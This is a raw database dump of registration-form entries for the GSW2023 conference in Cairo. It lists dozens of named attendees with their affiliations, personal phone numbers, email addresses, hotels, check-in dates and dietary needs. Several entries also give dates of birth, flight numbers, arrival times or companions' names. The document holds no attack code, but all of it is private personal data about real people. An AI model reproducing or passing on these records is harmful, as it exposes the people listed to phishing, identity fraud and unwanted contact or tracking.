(377,1,36,'names','first_name','YUWEI'),
(378,1,36,'names','last_name','CAO'),
(379,1,36,'country-list','','CN'),
(380,1,36,'subject_2','','Politecnico di Milano'),
(381,1,36,'input_text','','00393898270313'),
(382,1,36,'email','','yuwei.cao@polimi.it'),
(383,1,36,'numeric-field','','1589'),
(384,1,36,'subject_1','','14 Moustafa Abou HIF'),
(385,1,36,'Check_in_Date','','03/09/2023'),
(386,1,37,'input_radio','','Ms.'),
(387,1,37,'names','first_name','Xiaoming'),
(388,1,37,'names','last_name','Gao'),
(389,1,37,'country-list','','CN'),
(390,1,37,'subject_2','','Land Satellite Remote Sensing Application Center, Ministry of Natural Resources of the People’s Republic of China'),
(391,1,37,'input_text','','86 - 13691074823'),
(392,1,37,'email','','44761847@qq.com'),
(393,1,37,'numeric-field','','1296'),
(394,1,37,'subject_1','','Ramses Hilton Hotel'),
(395,1,37,'Check_in_Date','','02/09/2023'),
(396,1,37,'description','','Chinese food'),
(397,1,37,'datetime','','13/01/1981'),
(398,1,38,'input_radio','','Dr.'),
(399,1,38,'names','first_name','Xian'),
(400,1,38,'names','last_name','Guo'),
(401,1,38,'country-list','','CN'),
(402,1,38,'subject_2','','Beijing University of Civil Engineering and Architecture'),
(403,1,38,'input_text','','(86)15972045629'),
(404,1,38,'email','','guoxian@bucea.edu.cn'),
(405,1,38,'numeric-field','','1971'),
(406,1,38,'subject_1','','Ramses Hilton'),
(407,1,38,'Check_in_Date','','02/09/2023'),
(408,1,38,'description','','All types are OK'),
(409,1,38,'message','','We greatly appreciate your organizition of GSW2023. See you in Cairo XD'),
(410,1,39,'input_radio','','Miss.'),
(411,1,39,'names','first_name','SHREYA'),
(412,1,39,'names','last_name','.'),
(413,1,39,'country-list','','IN'),
(414,1,39,'subject_2','','International Institute of Information Technology, Hyderabad'),
(415,1,39,'input_text','','+917903525759'),
(416,1,39,'email','','shreya.k@research.iiit.ac.in'),
(417,1,39,'numeric-field','','1166'),
(418,1,39,'subject_1','','Flamenco Cairo Hotel'),
(419,1,39,'Check_in_Date','','01/09/2023'),
(420,1,40,'input_radio','','Dr.'),
(421,1,40,'names','first_name','Marios'),
(422,1,40,'names','last_name','Tzouvaras'),
(423,1,40,'country-list','','GR'),
(424,1,40,'subject_2','','ERATOSTHENES Centre of Excellence'),
(425,1,40,'input_text','','0035799986689'),
(426,1,40,'email','','marios.tzouvaras@eratosthenes.org.cy'),
(427,1,40,'numeric-field','','1372'),
(428,1,40,'subject_1','','Steigenberger Hotel El Tahrir'),
(429,1,40,'Check_in_Date','','04/09/2023'),
(430,1,40,'datetime','','03/01/1983'),
(431,1,41,'input_radio','','Mr.'),
(432,1,41,'country-list','','BE'),
(433,1,41,'subject_2','','Ghent University'),
(434,1,41,'input_text','','+32476721473'),
(435,1,41,'email','','wouter.vandenbroeck@ugent.be'),
(436,1,41,'numeric-field','','1153'),
(437,1,41,'subject_1','','Ramses Hilton'),
(438,1,41,'Check_in_Date','','01/09/2023'),
(439,1,42,'input_radio','','Prof.'),
(440,1,42,'names','first_name','Dessislava'),
(441,1,42,'names','last_name','Petrova-Antonova'),
(442,1,42,'country-list','','BG'),
(443,1,42,'subject_2','','GATE Institute, Sofia University'),
(444,1,42,'input_text','','+359887572094'),
(445,1,42,'email','','d.petrova@fmi.uni-sofia.bg'),
(446,1,42,'numeric-field','','227'),
(447,1,42,'subject_1','','InterContinental Cairo Semiramis'),
(448,1,42,'Check_in_Date','','02/09/2023'),
(449,1,43,'input_radio','','Dr.'),
(450,1,43,'names','first_name','Joanna'),
(451,1,43,'names','last_name','Zawadzka'),
(452,1,43,'country-list','','PL'),
(453,1,43,'subject_2','','Cranfield University'),
(454,1,43,'input_text','','+44 7446 257 706'),
(455,1,43,'email','','joanna.zawadzka@cranfield.ac.uk'),
(456,1,43,'numeric-field','','2157'),
(457,1,43,'subject_1','','Up Town Hotel, Tahrir Square, Qasr Ad Dobarah, Abdeen, Cairo'),
(458,1,43,'Check_in_Date','','01/09/2023'),
(459,1,43,'description','','Wheat free, gluten free'),
(460,1,44,'input_radio','','Dr.'),
(461,1,44,'names','first_name','Jie'),
(462,1,44,'names','last_name','Zhao'),
(463,1,44,'country-list','','CN'),
(464,1,44,'subject_2','','TUM'),
(465,1,44,'input_text','','+4915751367584'),
(466,1,44,'email','','jie.zhao@tum.de'),
(467,1,44,'numeric-field','','1035'),
(468,1,44,'subject_1','','Flamenco Cairo Hotel'),
(469,1,44,'Check_in_Date','','01/08/2023'),
(470,1,45,'input_radio','','Ms.'),
(471,1,45,'names','first_name','Zhouyan'),
(472,1,45,'names','last_name','Qiu'),
(473,1,45,'country-list','','CN'),
(474,1,45,'subject_2','','The university of Vigo'),
(475,1,45,'input_text','','+34628047592'),
(476,1,45,'email','','msqiuzy@outlook.com'),
(477,1,45,'numeric-field','','1606'),
(478,1,45,'subject_1','','Ramses Hilton Hotel'),
(479,1,45,'Check_in_Date','','02/09/2023'),
(480,1,45,'description','','-'),
(481,1,45,'message','','-'),
(482,1,45,'datetime','','31/08/1994'),
(483,1,46,'input_radio','','Ms.'),
(484,1,46,'names','first_name','Zhaoju'),
(485,1,46,'names','last_name','Zheng'),
(486,1,46,'country-list','','CN'),
(487,1,46,'subject_2','','Aerospace Information Research Institute, Chinese Academy of Sciences'),
(488,1,46,'input_text','','+8618612016047'),
(489,1,46,'email','','zhengzhaoju@aircas.ac.cn'),
(490,1,46,'numeric-field','','802'),
(491,1,46,'subject_1','','Grand Nile Tower Hotel'),
(492,1,46,'Check_in_Date','','02/09/2023'),
(493,1,47,'input_radio','','Mr.'),
(494,1,47,'names','first_name','Miguel Luis'),
(495,1,47,'names','last_name','Lagahit'),
(496,1,47,'country-list','','PH'),
(497,1,47,'subject_2','','Tokyo Institute of Technology'),
(498,1,47,'input_text','','+81 080-2023-7439'),
(499,1,47,'email','','lagahit.m.aa@m.titech.ac.jp'),
(500,1,47,'numeric-field','','1716'),
(501,1,47,'subject_1','','Castle Hotel, Downtown Cairo'),
(502,1,47,'Check_in_Date','','01/09/2023'),
(503,1,48,'input_radio','','Mr.'),
(504,1,48,'names','first_name','HAIPENG'),
(505,1,48,'names','last_name','CHEN'),
(506,1,48,'country-list','','CN'),
(507,1,48,'subject_2','','National Quality Inspection and Testing Center for Surveying and Mapping Products'),
(508,1,48,'input_text','','+86 13718602259'),
(509,1,48,'email','','hachp@163.com'),
(510,1,48,'numeric-field','','2081'),
(511,1,48,'subject_1','','Ramses Hilton Hotel & Casino'),
(512,1,48,'Check_in_Date','','02/09/2023'),
(513,1,49,'input_radio','','Ms.'),
(514,1,49,'names','first_name','WENLI'),
(515,1,49,'names','last_name','HAN'),
(516,1,49,'country-list','','CN'),
(517,1,49,'subject_2','','National Quality Inspection and Testing Center for Surveying and Mapping Products'),
(518,1,49,'input_text','','+86 13910993256'),
(519,1,49,'email','','88212479@qq.com'),
(520,1,49,'numeric-field','','2142'),
(521,1,49,'subject_1','','Ramses Hilton Hotel & Casino'),
(522,1,49,'Check_in_Date','','02/09/2023'),
(523,1,50,'input_radio','','Miss.'),
(524,1,50,'names','first_name','Yuanyuan'),
(525,1,50,'names','last_name','Wang'),
(526,1,50,'country-list','','CN'),
(527,1,50,'subject_2','','Nanjing University of Aeronautics and Astronautics'),
(528,1,50,'input_text','','+86 13083073592'),
(529,1,50,'email','','yuanyuan.wang@nuaa.edu.cn'),
(530,1,50,'numeric-field','','1842'),
(531,1,50,'subject_1','','INTERCONTINENTAL CAIRO SEMIRAMIS'),
(532,1,50,'Check_in_Date','','02/09/2023'),
(533,1,51,'input_radio','','Miss.'),
(534,1,51,'names','first_name','Rui'),
(535,1,51,'names','last_name','Sun'),
(536,1,51,'country-list','','CN'),
(537,1,51,'subject_2','','Nanjing University of Aeronautics and Astronautics'),
(538,1,51,'input_text','','+86 15601696801'),
(539,1,51,'email','','rui.sun@nuaa.edu.cn'),
(540,1,51,'numeric-field','','2059'),
(541,1,51,'subject_1','','INTERCONTINENTAL CAIRO SEMIRAMIS'),
(542,1,51,'Check_in_Date','','02/09/2023'),
(543,1,52,'input_radio','','Dr.'),
(544,1,52,'names','first_name','ARIEL'),
(545,1,52,'names','last_name','BLANCO'),
(546,1,52,'country-list','','PH'),
(547,1,52,'subject_2','','Philippine Space Agency'),
(548,1,52,'input_text','','+639989662207'),
(549,1,52,'email','','ariel.blanco@philsa.gov.ph'),
(550,1,52,'numeric-field','','716'),
(551,1,52,'subject_1','','Ramses Hilton'),
(552,1,52,'Check_in_Date','','02/09/2023'),
(553,1,52,'description','','Seafood'),
(554,1,53,'input_radio','','Prof.'),
(555,1,53,'names','first_name','Yuan'),
(556,1,53,'names','last_name','Zhuang'),
(557,1,53,'country-list','','CN'),
(558,1,53,'subject_2','','Wuhan University'),
(559,1,53,'input_text','','9547065898'),
(560,1,53,'email','','zhy.0908@gmail.com'),
(561,1,53,'numeric-field','','1246'),
(562,1,53,'subject_1','','InterContinental Cairo Semiramis'),
(563,1,53,'Check_in_Date','','02/09/2023'),
(564,1,53,'description','','Asian food'),
(565,1,54,'input_radio','','Prof.'),
(566,1,54,'names','first_name','JUN'),
(567,1,54,'names','last_name','CHEN'),
(568,1,54,'country-list','','CN'),
(569,1,54,'subject_2','','PROF.'),
(570,1,54,'input_text','','+86-13901096882'),
(571,1,54,'email','','isprs@ngcc.cn'),
(572,1,54,'numeric-field','','2181'),
(573,1,54,'subject_1','','Ramses Hilton'),
(574,1,54,'Check_in_Date','','02/09/2023'),
(575,1,54,'message','','need transportation for one more accompany person: Ms. Xie Bingyu'),
(576,1,55,'input_radio','','Prof.'),
(577,1,55,'names','first_name','Junfeng'),
(578,1,55,'names','last_name','Xie'),
(579,1,55,'country-list','','CN'),
(580,1,55,'subject_2','','Ministry of Natural Resource'),
(581,1,55,'input_text','','+86-10-18600929216'),
(582,1,55,'email','','junfeng_xie@163.com'),
(583,1,55,'numeric-field','','1689'),
(584,1,55,'subject_1','','Ramses Hilton Hotel'),
(585,1,55,'Check_in_Date','','02/09/2023'),
(586,1,56,'input_radio','','Mr.'),
(587,1,56,'names','first_name','Kavach'),
(588,1,56,'names','last_name','Mishra'),
(589,1,56,'country-list','','IN'),
(590,1,56,'subject_2','','Indian Institute of Technology Roorkee'),
(591,1,56,'input_text','','+919099379268'),
(592,1,56,'email','','kmishra@ce.iitr.ac.in'),
(593,1,56,'numeric-field','','1840'),
(594,1,56,'subject_1','','Novotel Cairo Airport, Sheraton Al Matar, El Nozha, Cairo Governorate 11776, Egypt'),
(595,1,56,'Check_in_Date','','01/09/2023'),
(596,1,56,'message','','Transfer from Hotel to Conference Venue required on 2 September 2023'),
(597,1,57,'input_radio','','Mr.'),
(598,1,57,'names','first_name','Kavach'),
(599,1,57,'names','last_name','Mishra'),
(600,1,57,'country-list','','IN'),
(601,1,57,'subject_2','','Indian Institute of Technology Roorkee'),
(602,1,57,'input_text','','+919099379268'),
(603,1,57,'email','','kmishra@ce.iitr.ac.in'),
(604,1,57,'numeric-field','','1840'),
(605,1,57,'subject_1','','Brassbell apartments in Zamalek, 15 Ismail Mohammed, Zamalek, Cairo, 12345, Egypt'),
(606,1,57,'Check_in_Date','','03/09/2023'),
(607,1,57,'message','','Transfer from Hotel to Conference Venue required on 5 September 2023.'),
(608,1,58,'input_radio','','Ms.'),
(609,1,58,'names','first_name','Mareike'),
(610,1,58,'names','last_name','Dorozynski'),
(611,1,58,'country-list','','DE'),
(612,1,58,'subject_2','','Leibniz University Hannover'),
(613,1,58,'input_text','','+49 175 12 64 800'),
(614,1,58,'email','','dorozynski@ipi.uni-hannover.de'),
(615,1,58,'numeric-field','','1639'),
(616,1,58,'subject_1','','Hotel Novotel Cairo El Borg'),
(617,1,58,'Check_in_Date','','01/09/2023'),
(618,1,58,'description','','vegetarian'),
(619,1,59,'input_radio','','Mr.'),
(620,1,59,'names','first_name','Chima'),
(621,1,59,'names','last_name','Iheaturu'),
(622,1,59,'country-list','','NG'),
(623,1,59,'subject_2','','University of Bern'),
(624,1,59,'input_text','','+41767384360'),
(625,1,59,'email','','chima.geomaven@gmail.com'),
(626,1,59,'numeric-field','','1342'),
(627,1,59,'subject_1','','New Grand Royal Hotel Cairo'),
(628,1,59,'Check_in_Date','','31/08/2023'),
(629,1,59,'datetime','','14/03/1989'),
(630,1,60,'input_radio','','Mr.'),
(631,1,60,'names','first_name','Petar'),
(632,1,60,'names','last_name','Jeremic'),
(633,1,60,'country-list','','RS'),
(634,1,60,'subject_2','','MDPI'),
(635,1,60,'input_text','','+381644595421'),
(636,1,60,'email','','jeremic@mdpi.com'),
(637,1,60,'numeric-field','','2046'),
(638,1,60,'subject_1','','Garden Season Hotel 8 Ibrahim Naguib Garden City, Garden City, 11511 Cairo, Egypt'),
(639,1,60,'Check_in_Date','','01/09/2023'),
(640,1,61,'input_radio','','Dr.'),
(641,1,61,'names','first_name','Yan'),
(642,1,61,'names','last_name','Xia'),
(643,1,61,'country-list','','CN'),
(644,1,61,'subject_2','','Technical University of Munich'),
(645,1,61,'input_text','','+4901743885847'),
(646,1,61,'email','','yan.xia@tum.de'),
(647,1,61,'numeric-field','','1079'),
(648,1,61,'subject_1','','Ramses Hilton'),
(649,1,61,'Check_in_Date','','01/09/2023'),
(650,1,61,'description','','meat'),
(651,1,62,'input_radio','','Dr.'),
(652,1,62,'names','first_name','Max'),
(653,1,62,'names','last_name','Mehltretter'),
(654,1,62,'country-list','','DE'),
(655,1,62,'subject_2','','Institute of Photogrammetry and GeoInformation, Leibniz University Hannover'),
(656,1,62,'input_text','','+4915772700293'),
(657,1,62,'email','','mehltretter@ipi.uni-hannover.de'),
(658,1,62,'numeric-field','','98'),
(659,1,62,'subject_1','','Novotel Cairo El Borg'),
(660,1,62,'Check_in_Date','','02/09/2023'),
(661,1,63,'input_radio','','Ms.'),
(662,1,63,'names','first_name','Lucie'),
(663,1,63,'names','last_name','Kupková'),
(664,1,63,'country-list','','CZ'),
(665,1,63,'subject_2','','Charles University Prague'),
(666,1,63,'input_text','','+420605281181'),
(667,1,63,'email','','lucie.kupkova@natur.cuni.cz'),
(668,1,63,'numeric-field','','1131'),
(669,1,63,'subject_1','','Grand Nile Tower Hotel'),
(670,1,63,'Check_in_Date','','02/09/2023'),
(671,1,64,'input_radio','','Mr.'),
(672,1,64,'names','first_name','Karam'),
(673,1,64,'names','last_name','Mawas'),
(674,1,64,'country-list','','DE'),
(675,1,64,'subject_2','','University of Braunschweig Institute of Geodesy and Photogrammetry'),
(676,1,64,'input_text','','0049 531 391 94582'),
(677,1,64,'email','','k.mawas@tu-bs.de'),
(678,1,64,'numeric-field','','1472'),
(679,1,64,'subject_1','','Ramses Hilton hotel, 1115 Corniche El NileCairo, Egypt'),
(680,1,64,'Check_in_Date','','01/09/2023'),
(681,1,65,'input_radio','','Prof.'),
(682,1,65,'names','first_name','Jónatas'),
(683,1,65,'names','last_name','Valença'),
(684,1,65,'country-list','','PT'),
(685,1,65,'subject_2','','CERIS, Univ. Lisboa'),
(686,1,65,'input_text','','+351 918823733'),
(687,1,65,'email','','jonatas.valenca@tecnico.ulisboa.pt'),
(688,1,65,'numeric-field','','803'),
(689,1,65,'subject_1','','City View Hotel, 1 Al Bustan St, Ismailia, Qasr El Nil, Cairo Governorate 4272101, Egito'),
(690,1,65,'Check_in_Date','','01/09/2023'),
(691,1,65,'description','','Any'),
(692,1,65,'message','','I think I can walk to the conference venue. Thanks'),
(693,1,65,'datetime','','24/04/1980'),
(694,1,66,'input_radio','','Dr.'),
(695,1,66,'names','first_name','Ajeet'),
(696,1,66,'names','last_name','Kumar'),
(697,1,66,'country-list','','IN'),
(698,1,66,'subject_2','','Researcher in Italy'),
(699,1,66,'input_text','','+918210067477 (whatsapp)'),
(700,1,66,'email','','ajeet.kumar.in@ieee.org'),
(701,1,66,'numeric-field','','1907'),
(702,1,66,'subject_1','','Flamenco Cairo Hotel'),
(703,1,66,'Check_in_Date','','04/08/2023'),
(704,1,66,'description','','Preferably Vegetarian Asian Food.'),
(705,1,66,'message','','Dear Concerned Authority,\r\n     I will reach the hotel on the 4th of September and continuously attend the conference on the 5th, 6th and 7th of September. Please arrange a travel vehicle for me from the Hotel to the Conference venue at around 9 am on the 5th, 6th and 7th of September, and in the evening after completion of the sessions for all the said days.\r\n\r\nI really appreciate your support in this.'),
(706,1,67,'input_radio','','Mr.'),
(707,1,67,'names','first_name','yuhang'),
(708,1,67,'names','last_name','xu'),
(709,1,67,'country-list','','CN'),
(710,1,67,'subject_2','','Wuhan University'),
(711,1,67,'input_text','','+86 15353445973'),
(712,1,67,'email','','1728572230@qq.com'),
(713,1,67,'numeric-field','','185'),
(714,1,67,'subject_1','','InterContinental Cairo Semiramis'),
(715,1,67,'Check_in_Date','','01/09/2023'),
(716,1,68,'input_radio','','Mr.'),
(717,1,68,'names','first_name','SHANGZHE'),
(718,1,68,'names','last_name','SUN'),
(719,1,68,'country-list','','CN'),
(720,1,68,'subject_2','','Wuhan University'),
(721,1,68,'input_text','','+8615927225466'),
(722,1,68,'email','','sszoo@foxmail.com'),
(723,1,68,'numeric-field','','178'),
(724,1,68,'subject_1','','InterContinental Cairo Semiramis'),
(725,1,68,'Check_in_Date','','01/09/2023'),
(726,1,68,'description','','Chinese Food'),
(727,1,68,'message','','Best Wishes to you all!'),
(728,1,68,'datetime','','02/09/1997'),
(729,1,69,'input_radio','','Mr.'),
(730,1,69,'names','first_name','Juan Pablo'),
(731,1,69,'names','last_name','Duque Ordonez'),
(732,1,69,'country-list','','CO'),
(733,1,69,'subject_2','','Politecnico di Milano'),
(734,1,69,'input_text','','+393517319088'),
(735,1,69,'email','','juanpablo.duque@polimi.it'),
(736,1,69,'numeric-field','','1407'),
(737,1,69,'subject_1','','Tahrir Plaza Suites'),
(738,1,69,'Check_in_Date','','01/09/2023'),
(739,1,70,'input_radio','','Ms.'),
(740,1,70,'names','first_name','Angelly de Jesus'),
(741,1,70,'names','last_name','Pugliese Viloria'),
(742,1,70,'country-list','','CO'),
(743,1,70,'subject_2','','Politecnico di Milano'),
(744,1,70,'input_text','','+393517351508'),
(745,1,70,'email','','angellyde.pugliese@polimi.it'),
(746,1,70,'numeric-field','','1425'),
(747,1,70,'subject_1','','Tahrir Plaza Suites'),
(748,1,70,'Check_in_Date','','01/09/2023'),
(749,1,71,'input_radio','','Dr.'),
(750,1,71,'names','first_name','Zongliang'),
(751,1,71,'names','last_name','Zhang'),
(752,1,71,'country-list','','CN'),
(753,1,71,'subject_2','','Jimei University'),
(754,1,71,'input_text','','+8615980262300'),
(755,1,71,'email','','zzl@jmu.edu.cn'),
(756,1,71,'numeric-field','','1548'),
(757,1,71,'subject_1','','InterContinental Cairo Semiramis'),
(758,1,71,'Check_in_Date','','01/09/2023'),
(759,1,71,'datetime','','26/04/1986'),
(760,1,72,'input_radio','','Miss.'),
(761,1,72,'names','first_name','Ma Bea Angela'),
(762,1,72,'names','last_name','Zamora'),
(763,1,72,'country-list','','PH'),
(764,1,72,'subject_2','','University of the Philippines - Diliman'),
(765,1,72,'input_text','','+639273572322'),
(766,1,72,'email','','mizamora@up.edu.ph'),
(767,1,72,'numeric-field','','1137'),
(768,1,72,'subject_1','','Ramses Hilton Hotel'),
(769,1,72,'Check_in_Date','','02/09/2023'),
(770,1,72,'description','','Anything with rice! Not a fan of spicy food.'),
(771,1,72,'message','','Thank you for the opportunity! Hoping for the great success of this event!'),
(772,1,73,'input_radio','','Dr.'),
(773,1,73,'names','first_name','Michele'),
(774,1,73,'names','last_name','Crosetto'),
(775,1,73,'country-list','','IT'),
(776,1,73,'subject_2','','CTTC'),
(777,1,73,'input_text','','0034695560351'),
(778,1,73,'email','','mcrosetto@cttc.cat'),
(779,1,73,'numeric-field','','1101'),
(780,1,73,'subject_1','','NOVOTEL CAIRO EL BORG'),
(781,1,73,'Check_in_Date','','02/09/2023'),
(782,1,74,'input_radio','','Dr.'),
(783,1,74,'names','first_name','Abdullah'),
(784,1,74,'names','last_name','Almuthibi'),
(785,1,74,'country-list','','SA'),
(786,1,74,'subject_2','','Ministry of Environment Water and Agriculture'),
(787,1,74,'input_text','','966553020610'),
(788,1,74,'email','','aalmuthibi@ncvc.gov.sa'),
(789,1,74,'numeric-field','','4'),
(790,1,74,'subject_1','','Four Seasons Hotel Cairo at Nile Plaza'),
(791,1,74,'Check_in_Date','','01/09/2023'),
(792,1,74,'message','','نشكركم على تنظيم هذا المؤتمر، وتنمنى لكم التوفيق\r\nكما أود أن اسأل عن التسهيلات المتوفرة لديكم للزوار الممثلين لجهات حكومية من المملكة العربية السعودية'),
(793,1,75,'input_radio','','Miss.'),
(794,1,75,'names','first_name','Elizaveta'),
(795,1,75,'names','last_name','Spiridonova'),
(796,1,75,'country-list','','RU'),
(797,1,75,'subject_2','','Agisoft LLC'),
(798,1,75,'input_text','','+79647089827'),
(799,1,75,'email','','e.spiridonova@agisoft.com'),
(800,1,75,'numeric-field','','2200'),
(801,1,75,'subject_1','','Cleopatra Hotel, 2 Al Bustan street, Downtown, Cairo'),
(802,1,75,'Check_in_Date','','01/09/2023'),
(803,1,75,'message','','Agisoft team (4 people):\r\nDiana Ovod\r\nElizaveta Spiridonova\r\nNikolai Poliarnyi \r\nTerekhov Anton\r\n\r\nPeriod of stay: 01.09.23 - 09.01.23'),
(804,1,76,'input_radio','','Dr.'),
(805,1,76,'names','first_name','Bolelang'),
(806,1,76,'names','last_name','Sibolla'),
(807,1,76,'country-list','','ZA'),
(808,1,76,'subject_2','','Council for Scientific and Industrial Research - CSIR'),
(809,1,76,'input_text','','+27-72-371-5992'),
(810,1,76,'email','','bsibolla@csir.co.za'),
(811,1,76,'numeric-field','','1322'),
(812,1,76,'subject_1','','Steigenberger Hotel El Tahrir Cairo'),
(813,1,76,'Check_in_Date','','02/09/2023'),
(814,1,77,'input_radio','','Dr.'),
(815,1,77,'names','first_name','Pedro Marco'),
(816,1,77,'names','last_name','Achanccaray Diaz'),
(817,1,77,'country-list','','PE'),
(818,1,77,'subject_2','','Technical University of Braunschweig'),
(819,1,77,'input_text','','+4915155394325'),
(820,1,77,'email','','p.diaz@tu-braunschweig.de'),
(821,1,77,'numeric-field','','332'),
(822,1,77,'subject_1','','Ramses Hilton'),
(823,1,77,'Check_in_Date','','02/09/2023'),
(824,1,77,'description','','Chicken'),
(825,1,77,'datetime','','09/05/1989'),
(826,1,78,'input_radio','','Miss.'),
(827,1,78,'names','first_name','Diana'),
(828,1,78,'names','last_name','Ovod'),
(829,1,78,'country-list','','RU'),
(830,1,78,'subject_2','','Agisoft LLC'),
(831,1,78,'input_text','','+79052567986'),
(832,1,78,'email','','diana.ovod@agisoft.com'),
(833,1,78,'numeric-field','','2186'),
(834,1,78,'subject_1','','Cleopatra Hotel, 2 Al Bustan street, Downtown, Cairo'),
(835,1,78,'Check_in_Date','','01/09/2023'),
(836,1,79,'input_radio','','Mr.'),
(837,1,79,'names','first_name','Nikolai'),
(838,1,79,'names','last_name','Poliarnyi'),
(839,1,79,'country-list','','RU'),
(840,1,79,'subject_2','','Agisoft LLC'),
(841,1,79,'input_text','','+79119591170'),
(842,1,79,'email','','polarhare@gmail.com'),
(843,1,79,'numeric-field','','2189'),
(844,1,79,'subject_1','','Cleopatra Hotel'),
(845,1,79,'Check_in_Date','','01/09/2023'),
(846,1,79,'description','','gluten-free'),
(847,1,80,'input_radio','','Mr.'),
(848,1,80,'names','first_name','Anton'),
(849,1,80,'names','last_name','Terekhov'),
(850,1,80,'country-list','','RU'),
(851,1,80,'subject_2','','Agisoft LLC'),
(852,1,80,'input_text','','+996550750079'),
(853,1,80,'email','','a.terekhov@agisoft.com'),
(854,1,80,'numeric-field','','2204'),
(855,1,80,'subject_1','','Сleopatra Hotel'),
(856,1,80,'Check_in_Date','','01/09/2023'),
(857,1,81,'input_radio','','Mr.'),
(858,1,81,'names','first_name','Mustafa Can'),
(859,1,81,'names','last_name','Ozkan'),
(860,1,81,'country-list','','TR'),
(861,1,81,'subject_2','','University College London'),
(862,1,81,'input_text','','+44 0 74 6789 7777'),
(863,1,81,'email','','ucesmco@ucl.ac.uk'),
(864,1,81,'numeric-field','','1598'),
(865,1,81,'subject_1','','Hilton Ramses'),
(866,1,81,'Check_in_Date','','02/08/2023'),
(867,1,81,'datetime','','04/05/1992'),
(868,1,82,'input_radio','','Mr.'),
(869,1,82,'country-list','','CN'),
(870,1,82,'subject_2','','University of Warwick'),
(871,1,82,'input_text','','07421726001'),
(872,1,82,'email','','rui.li.4@warwick.ac.uk'),
(873,1,82,'numeric-field','','1530'),
(874,1,82,'subject_1','','Hilton'),
(875,1,82,'Check_in_Date','','01/08/2023'),
(876,1,83,'input_radio','','Eng.'),
(877,1,83,'names','first_name','Nicole'),
(878,1,83,'names','last_name','Pascucci'),
(879,1,83,'country-list','','IT'),
(880,1,83,'subject_2','','University of L\'Aquila'),
(881,1,83,'input_text','','+39 3408620224'),
(882,1,83,'email','','nicole.pascucci@graduate.univaq.it'),
(883,1,83,'numeric-field','','1532'),
(884,1,83,'subject_1','','Novotel Cairo El Borg'),
(885,1,83,'Check_in_Date','','03/09/2023'),
(886,1,83,'datetime','','10/11/1993'),
(887,1,84,'input_radio','','Prof.'),
(888,1,84,'names','first_name','SEEMA'),
(889,1,84,'names','last_name','JALAN'),
(890,1,84,'country-list','','IN'),
(891,1,84,'subject_2','','Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA'),
(892,1,84,'input_text','','+919887643513'),
(893,1,84,'email','','seemajalan1@gmail.com'),
(894,1,84,'numeric-field','','1521'),
(895,1,84,'subject_1','','CAIRO CAPITAL PLAZA'),
(896,1,84,'Check_in_Date','','01/09/2023'),
(897,1,84,'description','','INDIAN VEG'),
(898,1,84,'message','','Please book a promotional Shuttle bus from the Airport to my Hotel (one way) at cost of $5 USD. We are three delegates from India and staying at Hotel Cairo Capital Plaza, 24, Kasr El Nile, Cairo. We will be arriving at CAIRO Airport Terminal 3  on 01 September, 2023 at 20.55 hrs by EGYPT-AIR airlines flight no. MS-976. \r\nPlease confirm the booking as early as possible. \r\nRegards'),
(899,1,84,'datetime','','21/07/1975'),
(900,1,85,'input_radio','','Prof.'),
(901,1,85,'names','first_name','SEEMA'),
(902,1,85,'names','last_name','JALAN'),
(903,1,85,'country-list','','IN'),
(904,1,85,'subject_2','','Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA'),
(905,1,85,'input_text','','+919887643513'),
(906,1,85,'email','','seemajalan1@gmail.com'),
(907,1,85,'numeric-field','','1521'),
(908,1,85,'subject_1','','CAIRO CAPITAL PLAZA'),
(909,1,85,'Check_in_Date','','01/09/2023'),
(910,1,85,'description','','INDIAN VEG'),
(911,1,85,'message','','Please book a promotional Shuttle bus from the Airport to my Hotel (one way) at cost of $5 USD. We are three delegates from India and staying at Hotel Cairo Capital Plaza, 24, Kasr El Nile, Cairo. We will be arriving at CAIRO Airport Terminal 3  on 01 September, 2023 at 20.55 hrs by EGYPT-AIR airlines flight no. MS-976. \r\nPlease confirm the booking as early as possible. \r\nRegards'),
(912,1,85,'datetime','','21/07/1975'),
(913,1,86,'input_radio','','Prof.'),
(914,1,86,'names','first_name','SEEMA'),
(915,1,86,'names','last_name','JALAN'),
(916,1,86,'country-list','','IN'),
(917,1,86,'subject_2','','Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA'),
(918,1,86,'input_text','','+919887643513'),
(919,1,86,'email','','seemajalan1@gmail.com'),
(920,1,86,'numeric-field','','1521'),
(921,1,86,'subject_1','','CAIRO CAPITAL PLAZA, 24, KASR AL NILE, CAIRO'),
(922,1,86,'Check_in_Date','','01/09/2023'),
(923,1,86,'description','','INDIAN VEGETARIAN'),
(924,1,86,'message','','If possible please arrange transportation bus from our hotel to the conference venue. We are 03 delegates from India staying in the hotel for the conference. \r\n\r\nThanks'),
(925,1,87,'input_radio','','Ms.'),
(926,1,87,'names','first_name','Vipasha'),
(927,1,87,'names','last_name','Sharma'),
(928,1,87,'country-list','','IN'),
(929,1,87,'subject_2','','PhD Scholar'),
(930,1,87,'input_text','','8628974193'),
(931,1,87,'email','','v_sharma@ce.iitr.ac.in'),
(932,1,87,'numeric-field','','1809'),
(933,1,87,'subject_1','','Ramses Hilton Cairo'),
(934,1,87,'Check_in_Date','','02/09/2023'),
(935,1,87,'description','','Vegan/Vegetarian'),
(936,1,87,'message','','Accompanied by my husband, Mr Tushar Bharadwaj'),
(937,1,88,'input_radio','','Dr.'),
(938,1,88,'names','first_name','Kimon'),
(939,1,88,'names','last_name','Papadimitriou'),
(940,1,88,'country-list','','GR'),
(941,1,88,'subject_2','','Aristotle University of Thessaloniki'),
(942,1,88,'input_text','','00306955500107'),
(943,1,88,'email','','paki@auth.gr'),
(944,1,88,'numeric-field','','2067'),
(945,1,88,'subject_1','','PYRAMISA SUITES HOTEL & CASINO CAIRO'),
(946,1,88,'Check_in_Date','','02/09/2023'),
(947,1,88,'description','','Mediterranean'),
(948,1,89,'input_radio','','Mr.'),
(949,1,89,'names','first_name','Raymond'),
(950,1,89,'names','last_name','Molapo'),
(951,1,89,'country-list','','ZA'),
(952,1,89,'subject_2','','Council for Scientific and Industrial Research'),
(953,1,89,'input_text','','+27789444773'),
(954,1,89,'email','','nkadi.ray@gmail.com'),
(955,1,89,'numeric-field','','2080'),
(956,1,89,'subject_1','','Steigenberger Hotel El Tahrir'),
(957,1,89,'Check_in_Date','','01/09/2023'),
(958,1,89,'message','','I am very excited and looking forward to the trip'),
(959,1,89,'datetime','','15/03/1986'),
(960,1,90,'input_radio','','Dr.'),
(961,1,90,'names','first_name','Lizwe'),
(962,1,90,'names','last_name','Mdakane'),
(963,1,90,'country-list','','ZA'),
